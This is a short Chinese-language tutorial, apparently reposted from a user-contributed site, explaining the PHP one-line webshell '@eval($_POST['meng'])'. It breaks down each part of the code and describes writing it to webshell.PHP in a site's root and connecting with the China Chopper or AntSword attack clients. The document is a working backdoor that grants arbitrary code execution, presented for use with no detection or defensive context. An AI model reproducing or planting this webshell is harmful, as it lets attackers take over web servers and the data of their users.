<?PHP @eval($_POST['meng']); ?>
说明:
@:错误控制符,即使出现错误,也无视出现的错误信息,继续执行下边的代码。
eval()函数:把字符串按照PHP 代码来计算。该字符串必须是合法的PHP代码,且必须以分号结尾。
meng:名称可以随便定义,是接收菜刀或蚁剑通过 POST 方式发送过来的代码数据,也可称为菜刀或蚁剑连接一句话木马的密码。 (说的简单点,就是PHP任意代码执行,看下面的示例很容易就明白了。)示例1:在网站根目录创建webshell.PHP文件并写入一句话木马,然后访问。如图所示对一句话木马的利用。
示例2:使用蚁剑连接webshell.PHP
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 [email protected] 举报,一经查实,本站将立刻删除。
